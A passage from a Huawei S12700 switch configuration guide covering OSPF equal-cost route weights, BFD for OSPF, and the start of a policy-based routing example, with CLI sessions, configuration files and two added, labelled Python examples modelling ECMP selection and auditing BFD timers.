Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 11 Routes : 11

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10
10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Direct 0 0 D 10.1.2.1 Vlanif20
10.1.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
172.16.1.0/24 Direct 0 0 D 172.16.1.1 Vlanif50
172.16.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
172.17.1.0/24 OSPF 10 3 D 10.1.2.2 Vlanif20
192.168.0.0/24 OSPF 10 2 D 10.1.1.2 Vlanif10
192.168.1.0/24 OSPF 10 2 D 10.1.2.2 Vlanif20

As shown in the routing table, after the weight is set for equal-cost routes, the next hop
10.1.2.2 (SwitchC) with weight 1 has a higher priority than 10.1.1.2 (SwitchB). OSPF
selects the route with the next hop 10.1.2.2 as the optimal route.
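The five-factor next-hop selection described in the overview and the weight-based preference configured in Step 4, modelled as added example code that is not from the Huawei document. The SHA-256 hash is an assumption made for illustration: the page states only that a flow with the same five factors always keeps the same next hop, not how the switch maps the factors to a path. The next-hop addresses and interfaces are SwitchA's from the routing table above; the flows are constructed, and the function and class names are the example's own.

```python
"""Added example: equal-cost next-hop selection by 5-tuple with weights.

Not part of the Huawei document. Models the behaviour the text describes:
a flow (source address, destination address, source port, destination
port, protocol) always keeps the same next hop, and 'nexthop <ip> weight <n>'
(default 255, larger value = lower priority) narrows the candidate set. The
SHA-256 hash is an assumption made for illustration; the page does not
state the switch's actual selection algorithm.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    sport: int
    dport: int
    proto: int


@dataclass(frozen=True)
class NextHop:
    address: str
    interface: str
    weight: int = 255  # page default; smaller value wins


def candidate_next_hops(next_hops: Iterable[NextHop],
                        max_ecmp: int = 16) -> List[NextHop]:
    """Keep the next hops at the best (lowest) weight, at most max_ecmp of them."""
    hops = list(next_hops)
    if not hops:
        return []
    best = min(h.weight for h in hops)
    return [h for h in hops if h.weight == best][:max_ecmp]


def select_next_hop(flow: Flow, next_hops: Iterable[NextHop],
                    max_ecmp: int = 16) -> NextHop:
    """Hash the 5-tuple over the candidates so one flow always takes one hop."""
    cands = candidate_next_hops(next_hops, max_ecmp)
    if not cands:
        raise LookupError("no next hop available")
    key = f"{flow.src}|{flow.dst}|{flow.sport}|{flow.dport}|{flow.proto}"
    digest = hashlib.sha256(key.encode()).digest()
    return cands[int.from_bytes(digest[:4], "big") % len(cands)]


def distribution(flows: Iterable[Flow],
                 next_hops: Iterable[NextHop]) -> Dict[str, int]:
    """Count how many flows each next-hop address receives."""
    hops = list(next_hops)
    counts: Dict[str, int] = {}
    for f in flows:
        addr = select_next_hop(f, hops).address
        counts[addr] = counts.get(addr, 0) + 1
    return counts


# SwitchA's two equal-cost next hops to 172.17.1.0/24 (Step 3 routing table).
EQUAL_COST_HOPS = [NextHop("10.1.1.2", "Vlanif10"), NextHop("10.1.2.2", "Vlanif20")]
# After 'nexthop 10.1.2.2 weight 1' in Step 4.
WEIGHTED_HOPS = [NextHop("10.1.1.2", "Vlanif10"),
                 NextHop("10.1.2.2", "Vlanif20", weight=1)]
# Constructed flows: 200 TCP sessions from a host behind SwitchA to one behind SwitchD.
SAMPLE_FLOWS = [Flow("172.16.1.10", "172.17.1.20", sport, 443, 6)
                for sport in range(40000, 40200)]

if __name__ == "__main__":
    print("equal cost:", distribution(SAMPLE_FLOWS, EQUAL_COST_HOPS))
    print("weighted:  ", distribution(SAMPLE_FLOWS, WEIGHTED_HOPS))
```

With the default weights the 200 constructed flows are spread over both next hops, and any single flow is pinned to one of them; once 10.1.2.2 carries weight 1 every flow leaves through Vlanif20, which is the single-route table shown after Step 4. The max_ecmp cap reproduces the per-platform limit the text mentions (16 on a modular switch).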

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20 50
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif50
ip address 172.16.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 50
#
ospf 1 router-id 10.10.10.1
nexthop 10.1.2.2 weight 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 172.16.1.0 0.0.0.255
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 10 30
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif30
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 30
#
ospf 1 router-id 10.10.10.2
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.0.0 0.0.0.255
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 20 40
#
interface Vlanif20
ip address 10.1.2.2 255.255.255.0
#
interface Vlanif40
ip address 192.168.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 40
#
ospf 1 router-id 10.10.10.3
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
l Configuration file of SwitchD
#
sysname SwitchD
#
vlan batch 30 40 60
#
interface Vlanif30
ip address 192.168.0.2 255.255.255.0
#
interface Vlanif40
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif60
ip address 172.17.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 40
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 60
#
ospf 1 router-id 10.10.10.4
area 0.0.0.0
network 172.17.1.0 0.0.0.255
network 192.168.0.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return

9.2.5 Example for Configuring BFD for OSPF


BFD for OSPF Overview
Bidirectional forwarding detection (BFD) is a mechanism to detect communication faults
between forwarding engines. BFD detects the connectivity of a data protocol on a path between
two systems. The path can be a physical or logical link. In BFD for OSPF, a BFD session is
associated with OSPF. The BFD session quickly detects a link fault and then notifies OSPF of
the fault. This speeds up OSPF's response to the change of the network topology.
Any link fault or topology change on the network causes the device to recalculate routes.
If the OSPF detection mechanism is used, the route recalculation time is the OSPF protocol
convergence time, and OSPF detects faults in seconds. In high-speed data transmission, for
example, at gigabit rates, a detection time longer than one second results in the loss of a
large amount of data. In delay-sensitive services such as voice, a delay longer than one
second is unacceptable. When an OSPF network requires high reliability or the services
running on the network are delay-sensitive, BFD for OSPF can be configured. BFD detects a
fault in the link between neighbors within milliseconds and notifies OSPF, which speeds up
OSPF network convergence.

Configuration Notes
l BFD needs to be configured on both ends between which the OSPF neighbor relationship is
established.
l The two ends that establish a BFD session must be located in the same network segment of
an OSPF area.
l The ospf bfd enable and ospf bfd block commands are mutually exclusive and cannot be
configured at the same time.
l Table 9-5 lists applicable products and versions of this configuration example.

Table 9-5 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 9-10, OSPF runs among SwitchA, SwitchB, and SwitchC, and the switch
between SwitchA and SwitchB only provides the transparent transmission function. SwitchA
and SwitchB need to quickly detect the status of the link between them. When the link
SwitchA-SwitchB is faulty, services can be quickly switched to the backup link SwitchA-
SwitchC-SwitchB.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 9-10 Networking diagram of configuring BFD for OSPF
[Figure: all three switches are in Area 0. SwitchA: GE1/0/2 VLANIF30 10.3.3.1/24 to SwitchB,
GE1/0/1 VLANIF10 10.1.1.1/24 to SwitchC. SwitchB: GE1/0/1 VLANIF30 10.3.3.2/24, GE1/0/2
VLANIF20 10.2.2.2/24 to SwitchC, GE1/0/3 VLANIF40 172.16.1.1/24. SwitchC: GE1/0/1 VLANIF10
10.1.1.2/24, GE1/0/2 VLANIF20 10.2.2.1/24.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure basic OSPF functions on SwitchA, SwitchB, and SwitchC to implement basic
connections on the OSPF network.
2. Configure BFD for OSPF on SwitchA, SwitchB, and SwitchC so that services can be
quickly switched to the backup link when the link between SwitchA and SwitchB is
faulty.

Procedure
Step 1 Configure VLANs that each interface belongs to.
# Configure SwitchA. The configurations of SwitchB and SwitchC are the same as the
configuration of SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 30
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 30
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Configure an IP address for each VLANIF interface.


# Configure SwitchA. The configurations of SwitchB and SwitchC are the same as the
configuration of SwitchA.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.1.1 24
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 30
[SwitchA-Vlanif30] ip address 10.3.3.1 24
[SwitchA-Vlanif30] quit

Step 3 Configure basic OSPF functions.


# Configure SwitchA.
[SwitchA] ospf 1 router-id 10.10.10.1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.3.3.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

# Configure SwitchB.
[SwitchB] ospf 1 router-id 10.10.10.2
[SwitchB-ospf-1] area 0
[SwitchB-ospf-1-area-0.0.0.0] network 10.2.2.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] network 10.3.3.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] network 172.16.1.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] quit
[SwitchB-ospf-1] quit

# Configure SwitchC.
[SwitchC] ospf 1 router-id 10.10.10.3
[SwitchC-ospf-1] area 0
[SwitchC-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] network 10.2.2.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] quit
[SwitchC-ospf-1] quit

# After the preceding configurations, run the display ospf peer command to check that the
neighbor relationships are set up among SwitchA, SwitchB, and SwitchC. The command output of
SwitchA is used as an example.
[SwitchA] display ospf peer

OSPF Process 1 with Router ID 10.10.10.1

Neighbors

Area 0.0.0.0 interface 10.1.1.1(Vlanif10)'s neighbors


Router ID: 10.10.10.3 Address: 10.1.1.2
State: Full Mode:Nbr is Master Priority: 1
DR: 10.1.1.2 BDR: 10.1.1.1 MTU: 0
Dead timer due in 38 sec
Retrans timer interval: 5
Neighbor is up for 00:00:15
Authentication Sequence: [ 0 ]

Neighbors

Area 0.0.0.0 interface 10.3.3.1(Vlanif30)'s neighbors


Router ID: 10.10.10.2 Address: 10.3.3.2
State: Full Mode:Nbr is Master Priority: 1
DR: 10.3.3.2 BDR: 10.3.3.1 MTU: 0
Dead timer due in 25 sec
Retrans timer interval: 5
Neighbor is up for 00:00:59
Authentication Sequence: [ 0 ]

# Check the OSPF routing table on SwitchA. You can see the routing entries to SwitchB and
SwitchC. However, the next-hop address of the route to the destination network segment
172.16.1.0/24 is 10.3.3.2, which indicates that the traffic is transmitted on the link
SwitchA→SwitchB.
[SwitchA] display ospf routing

OSPF Process 1 with Router ID 10.10.10.1


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
10.1.1.0/24 1 Transit 10.1.1.1 10.10.10.1 0.0.0.0
10.3.3.0/24 1 Transit 10.3.3.1 10.10.10.1 0.0.0.0
10.2.2.0/24 2 Transit 10.1.1.2 10.10.10.3 0.0.0.0
10.2.2.0/24 2 Transit 10.3.3.2 10.10.10.3 0.0.0.0
172.16.1.0/24 2 Stub 10.3.3.2 10.10.10.2 0.0.0.0

Total Nets: 5
Intra Area: 5 Inter Area: 0 ASE: 0 NSSA: 0

Step 4 Configure BFD for OSPF.

# Configure BFD for OSPF on SwitchA.


[SwitchA] bfd //Enable BFD globally.
[SwitchA-bfd] quit
[SwitchA] ospf 1
[SwitchA-ospf-1] bfd all-interfaces enable //Enable BFD in OSPF process 1.
[SwitchA-ospf-1] quit

# Configure BFD for OSPF on SwitchB.


[SwitchB] bfd //Enable BFD globally.
[SwitchB-bfd] quit
[SwitchB] ospf 1
[SwitchB-ospf-1] bfd all-interfaces enable //Enable BFD in OSPF process 1.
[SwitchB-ospf-1] quit

# Configure BFD for OSPF on SwitchC.


[SwitchC] bfd //Enable BFD globally.
[SwitchC-bfd] quit
[SwitchC] ospf 1
[SwitchC-ospf-1] bfd all-interfaces enable //Enable BFD in OSPF process 1.
[SwitchC-ospf-1] quit

# After the preceding configurations, run the display ospf bfd session all command on
SwitchA, SwitchB, or SwitchC. The peer BFD session is Up. The command output of
SwitchA is used as an example.
[SwitchA] display ospf bfd session all

OSPF Process 1 with Router ID 10.10.10.1


Area 0.0.0.0 interface 10.1.1.1(Vlanif10)'s BFD Sessions

NeighborId:10.10.10.3 AreaId:0.0.0.0 Interface:Vlanif10


BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8195 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.1.2 Diagnostic Info:No diagnostic information

Area 0.0.0.0 interface 10.3.3.1(Vlanif30)'s BFD Sessions

NeighborId:10.10.10.2 AreaId:0.0.0.0 Interface:Vlanif30


BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8194 LocalIpAdd:10.3.3.1
RemoteIpAdd:10.3.3.2 Diagnostic Info:No diagnostic information
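A check of the session parameters shown above, as added example code that is not part of the Huawei document. It parses the fields of display ospf bfd session all output (state, rx, tx, multiplier) and computes the local detection time as multiplier x max(rx, tx), which is the RFC 5880 rule under the assumption that the neighbor runs the same timers; sessions that are not Up, or whose detection time is not below the 40-second default OSPF dead interval, are flagged. The sample outputs are constructed after the one above (the second variant marks one session Down to exercise the check), and the function names are the example's own.

```python
"""Added example: parse 'display ospf bfd session all' and audit detection time.

Not part of the Huawei document. Reads the session fields shown in the
Step 4 output and computes the local detection time as
multiplier x max(rx, tx), the RFC 5880 rule under the assumption that the
neighbor uses the same timers. Sessions that are not Up, or whose detection
time is not below the OSPF dead interval, are flagged. Samples are
constructed; function names are this example's own.
"""
import re
from typing import Dict, List, Optional

FIELD_RE = {
    "neighbor": re.compile(r"NeighborId:(\S+)"),
    "interface": re.compile(r"Interface:(\S+)"),
    "state": re.compile(r"BFDState:(\S+)"),
    "rx_ms": re.compile(r"\brx\s*:(\d+)"),
    "tx_ms": re.compile(r"\btx\s*:(\d+)"),
    "multiplier": re.compile(r"Multiplier:(\d+)"),
    "remote_ip": re.compile(r"RemoteIpAdd:(\S+)"),
}
INT_FIELDS = {"rx_ms", "tx_ms", "multiplier"}


def parse_bfd_sessions(output: str) -> List[Dict[str, object]]:
    """One dict per session; a new session starts at each 'NeighborId:' line."""
    sessions: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for line in output.splitlines():
        if "NeighborId:" in line:
            current = {}
            sessions.append(current)
        if current is None:
            continue
        for key, pattern in FIELD_RE.items():
            m = pattern.search(line)
            if m:
                current[key] = int(m.group(1)) if key in INT_FIELDS else m.group(1)
    return sessions


def detection_time_ms(session: Dict[str, object]) -> int:
    """Local detection time in ms, assuming symmetric timers on both ends."""
    return int(session["multiplier"]) * max(int(session["rx_ms"]), int(session["tx_ms"]))


def audit_bfd(output: str, ospf_dead_ms: int = 40000) -> List[Dict[str, object]]:
    """Flag sessions that are not Up or that would not beat the OSPF dead timer."""
    findings = []
    for s in parse_bfd_sessions(output):
        det = detection_time_ms(s)
        findings.append({
            "neighbor": s["neighbor"],
            "interface": s["interface"],
            "up": str(s["state"]).lower() == "up",
            "detection_ms": det,
            "faster_than_ospf": det < ospf_dead_ms,
        })
    return findings


# Constructed sample shaped like the output on SwitchA after Step 4.
SAMPLE_BFD_UP = """\
OSPF Process 1 with Router ID 10.10.10.1

Area 0.0.0.0 interface 10.1.1.1(Vlanif10)'s BFD Sessions

NeighborId:10.10.10.3 AreaId:0.0.0.0 Interface:Vlanif10
BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8195 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.1.2 Diagnostic Info:No diagnostic information

Area 0.0.0.0 interface 10.3.3.1(Vlanif30)'s BFD Sessions

NeighborId:10.10.10.2 AreaId:0.0.0.0 Interface:Vlanif30
BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8194 LocalIpAdd:10.3.3.1
RemoteIpAdd:10.3.3.2 Diagnostic Info:No diagnostic information
"""
# Constructed variant: the SwitchA-SwitchB session has gone Down.
SAMPLE_BFD_ONE_DOWN = SAMPLE_BFD_UP.replace(
    "Interface:Vlanif30\nBFDState:up", "Interface:Vlanif30\nBFDState:down")

if __name__ == "__main__":
    for finding in audit_bfd(SAMPLE_BFD_ONE_DOWN):
        print(finding)
```

With the values shown on the page (rx 1000 ms, tx 1000 ms, multiplier 3) the detection time is 3000 ms, well below the 40-second OSPF dead interval; a session whose timers were raised far enough for this check to fail would no longer give OSPF any faster fault notification than its own hello mechanism.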

Step 5 Verify the configuration.


# Run the shutdown command on GE1/0/1 of SwitchB to simulate the link fault.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] shutdown

# Check the OSPF routing table on SwitchA.


[SwitchA] display ospf routing

OSPF Process 1 with Router ID 10.10.10.1


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
10.1.1.0/24 1 Transit 10.1.1.1 10.10.10.1 0.0.0.0
10.2.2.0/24 2 Transit 10.1.1.2 10.10.10.3 0.0.0.0
172.16.1.0/24 3 Stub 10.1.1.2 10.10.10.2 0.0.0.0

Total Nets: 3
Intra Area: 3 Inter Area: 0 ASE: 0 NSSA: 0

When the link SwitchA-SwitchB is faulty, the backup link SwitchA-SwitchC-SwitchB takes
effect and the next-hop address of the route to the destination network segment 172.16.1.0/24
changes to 10.1.1.2.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 30
#
bfd
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif30
ip address 10.3.3.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 30
#
ospf 1 router-id 10.10.10.1
bfd all-interfaces enable
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.3.3.0 0.0.0.255
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 20 30 40
#
bfd
#
interface Vlanif20
ip address 10.2.2.2 255.255.255.0
#
interface Vlanif30
ip address 10.3.3.2 255.255.255.0
#
interface Vlanif40
ip address 172.16.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 40
#
ospf 1 router-id 10.10.10.2
bfd all-interfaces enable
area 0.0.0.0
network 10.2.2.0 0.0.0.255
network 10.3.3.0 0.0.0.255
network 172.16.1.0 0.0.0.255
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 10 20
#
bfd
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif20
ip address 10.2.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.10.10.3
bfd all-interfaces enable
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.2.2.0 0.0.0.255
#
return

9.3 Typical PBR Configuration

9.3.1 Example for Configuring Traffic Policies to Implement Policy-based Routing (Redirection to Different Next Hops)

Policy-based Routing Overview


Traditionally, a device searches its routing table for routes based on the destination
addresses of received packets and then forwards the packets according to the routes.
Increasingly, users require packet routing based on user-defined policies. Policy-based
routing (PBR) is a data forwarding mechanism implemented based on user-defined policies.

On S series switches, PBR is implemented by redirecting incoming Layer 3 packets that
match traffic classification rules on an interface to a specified next-hop IP address.

When a specific data flow needs to be transmitted to a specified next hop, PBR can be
configured to meet this requirement. For example, different data flows can be transmitted on
different links to improve link efficiency. Data flows can be directed to security devices such
as firewalls for security filtering. Service data can be transmitted on a low-cost link to reduce
enterprises' data service costs without compromising service quality.

Configuration Notes
l If a device does not have the ARP entry that matches the specified next-hop IP address,
the device triggers ARP learning. If the device cannot learn the ARP entry, packets are
forwarded along the previous forwarding path without being redirected.
l If multiple next-hop IP addresses are configured using the redirect ip-nexthop or
redirect ipv6-nexthop command, the device redirects packets in active/standby link
mode. That is, the device determines active and standby links according to the sequence
in which next-hop IP addresses were configured. The first configured next-hop IP
address has the highest priority and its link functions as the active link, while links of
other next-hop IP addresses function as standby links. When the active link is Down, the
standby link of the second-highest-priority next-hop IP address is selected as the new
active link.
l If multiple next-hop IP addresses are configured using the redirect ip-multihop or
redirect ipv6-multihop command, the device redirects packets in equal-cost route load
balancing mode.
l Table 9-6 lists the products and versions to which this configuration example is
applicable.


Table 9-6 Applicable product models and versions

Product   Product Model         Software Version
S12700    S12708 and S12712     V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
S12700    S12704                V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
An enterprise network is dual-homed to two external network devices through the Switch, as
shown in Figure 9-11. One uplink is a high-speed link with the gateway at 10.1.20.1/24, and
the other is a low-speed link with the gateway at 10.1.30.1/24.

The enterprise intranet has two network segments: 192.168.1.0/24 and 192.168.2.0/24.
Network segment 192.168.1.0/24 belongs to the server zone and requires high link bandwidth.
Therefore, traffic of this network segment needs to be transmitted on the high-speed link.
Network segment 192.168.2.0/24 is used for Internet access and traffic of this network
segment is transmitted on the low-speed link.

Figure 9-11 PBR networking

[Figure not reproduced. SwitchA: GE1/0/1 in VLAN 10 (192.168.1.0/24), GE1/0/2 in VLAN 20 (192.168.2.0/24), GE1/0/3 uplink to the Switch. Switch: GE1/0/3 to SwitchA; GE1/0/1 in VLANIF100 (10.1.20.2/24) to the core network gateway 10.1.20.1/24; GE1/0/2 in VLANIF200 (10.1.30.2/24) to the gateway 10.1.30.1/24.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, configure interfaces, and configure routes to connect enterprise users to
the external network.
2. Configure ACLs to match data flows of network segments 192.168.1.0 and 192.168.2.0,
respectively.
3. Create traffic classifiers and reference the ACLs to differentiate packets.
4. Configure traffic behaviors to transmit data traffic matching different ACLs on different
links and allow traffic transmitted between the intranet users to pass through first.
5. Configure a traffic policy, bind the traffic classifiers and traffic behaviors to it, and apply
it to the inbound direction of GE1/0/3 on the Switch to implement PBR.


Procedure
Step 1 Create VLANs, configure interfaces, and configure routes for interworking.

# Create VLANs 10 and 20 on SwitchA.


<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20

# On SwitchA, set the link type of the interfaces connected to PCs to access and that of the
interface connected to the Switch to trunk, and add the interfaces to VLANs.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access
[SwitchA-GigabitEthernet1/0/1] port default vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 20
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20
[SwitchA-GigabitEthernet1/0/3] quit

# Create VLANs 10, 20, 100, and 200 on the Switch.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 100 200

# On the Switch, set the link type of the interface connected to SwitchA to trunk and that of
the interfaces connected to the external network to access, and add the interfaces to VLANs.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 100
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 200
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port link-type trunk
[Switch-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20
[Switch-GigabitEthernet1/0/3] quit

# On the Switch, configure VLANIF10 and VLANIF20 as user gateways and assign IP
addresses 192.168.1.1/24 and 192.168.2.1/24 to them, respectively.
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 192.168.1.1 24
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.1 24
[Switch-Vlanif20] quit

# On the Switch, configure VLANIF 100 and VLANIF 200 to connect to external network
devices and assign IP addresses 10.1.20.2/24 and 10.1.30.2/24 to them, respectively.
[Switch] interface vlanif 100
[Switch-Vlanif100] ip address 10.1.20.2 24
[Switch-Vlanif100] quit
[Switch] interface vlanif 200
[Switch-Vlanif200] ip address 10.1.30.2 24
[Switch-Vlanif200] quit


# On the Switch, configure two default routes and set their next-hop IP addresses to IP
addresses of the two external network devices respectively.
[Switch] ip route-static 0.0.0.0 0 10.1.20.1
[Switch] ip route-static 0.0.0.0 0 10.1.30.1

After the preceding configuration is complete, intranet users can access the external network.
To ensure that data flows of network segments 192.168.1.0/24 and 192.168.2.0/24 are
transmitted on the high-speed link and low-speed link respectively, continue to perform the
following configurations.

Step 2 Configure ACLs.

# On the Switch, create advanced ACLs 3000, 3001, and 3002.

[Switch] acl 3000 //This ACL is used to match data traffic between two network
segments of the intranet. The data traffic does not need to be redirected. If
this configuration is not performed, traffic between the network segments will be
redirected. As a result, communication between the network segments will fail.
[Switch-acl-adv-3000] rule permit ip source 192.168.1.0 0.0.0.255 destination
192.168.2.0 0.0.0.255
[Switch-acl-adv-3000] rule permit ip source 192.168.2.0 0.0.0.255 destination
192.168.1.0 0.0.0.255
[Switch-acl-adv-3000] quit
[Switch] acl 3001 //Match user data traffic of the intranet network segment
192.168.1.0/24.
[Switch-acl-adv-3001] rule permit ip source 192.168.1.0 0.0.0.255
[Switch-acl-adv-3001] quit
[Switch] acl 3002 //Match user data traffic of the intranet network segment
192.168.2.0/24.
[Switch-acl-adv-3002] rule permit ip source 192.168.2.0 0.0.0.255
[Switch-acl-adv-3002] quit

Step 3 Configure traffic classifiers.

# On the Switch, create traffic classifiers c0, c1, and c2, and bind c0 to ACL 3000, c1 to ACL
3001, and c2 to ACL 3002.
[Switch] traffic classifier c0 operator or
[Switch-classifier-c0] if-match acl 3000
[Switch-classifier-c0] quit
[Switch] traffic classifier c1 operator or
[Switch-classifier-c1] if-match acl 3001
[Switch-classifier-c1] quit
[Switch] traffic classifier c2 operator or
[Switch-classifier-c2] if-match acl 3002
[Switch-classifier-c2] quit

Step 4 Configure traffic behaviors.

# On the Switch, create traffic behaviors b0, b1, and b2, configure the permit action in b0,
and configure actions that redirect packets to IP addresses 10.1.20.1 and 10.1.30.1 in b1 and
b2 respectively.
[Switch] traffic behavior b0
[Switch-behavior-b0] permit
[Switch-behavior-b0] quit
[Switch] traffic behavior b1
[Switch-behavior-b1] redirect ip-nexthop 10.1.20.1
[Switch-behavior-b1] quit
[Switch] traffic behavior b2
[Switch-behavior-b2] redirect ip-nexthop 10.1.30.1
[Switch-behavior-b2] quit

Step 5 Configure a traffic policy and apply the traffic policy to an interface.


# On the Switch, create a traffic policy p1 and bind the traffic classifiers and traffic behaviors
to this traffic policy.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c0 behavior b0
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] classifier c2 behavior b2
[Switch-trafficpolicy-p1] quit

# Apply the traffic policy p1 to the inbound direction of GE1/0/3 on the Switch.
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/3] return

Step 6 Verify the configuration.

# Check the ACL configuration.


<Switch> display acl 3000
